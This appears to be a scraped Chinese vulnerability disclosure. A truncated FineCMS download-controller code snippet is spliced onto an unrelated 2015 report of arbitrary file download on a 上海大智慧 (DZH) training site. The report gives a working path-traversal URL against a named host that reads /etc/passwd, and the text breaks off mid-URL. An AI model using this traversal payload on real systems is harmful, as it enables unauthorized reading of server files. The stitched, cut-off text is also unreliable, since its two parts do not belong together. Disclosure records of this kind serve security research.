Author:Sinner
漏洞文件:
controllersApiController.php Line 54
public function downAction() {
$data = fn_authcode(base64_decode($this->get('file')), 'DECODE');
$file = isset($data['finecms']) && $data['finecms'] ? $data['finecms'] : '';
if (empty($file)) {
$this->msg(lang('a-mod-213'));
}
if (
漏洞标题
上海大智慧某网站任意文件下载到系统权限
相关厂商
上海大智慧
漏洞作者
Tea
提交时间
2015-04-05 22:51
公开时间
2015-05-22 13:12
漏洞类型
任意文件遍历/下载
危害等级
高
自评Rank
20
漏洞状态
厂商已经确认
Tags标签
漏洞详情
任意文件下载:
http://pub.px.gw.com.cn/training/download.jsp?filename=training/video/2008/12/23/../../../../../../../../../../../../etc/passwd&name=c
或者:
http://pub.px.gw.com.cn/training/down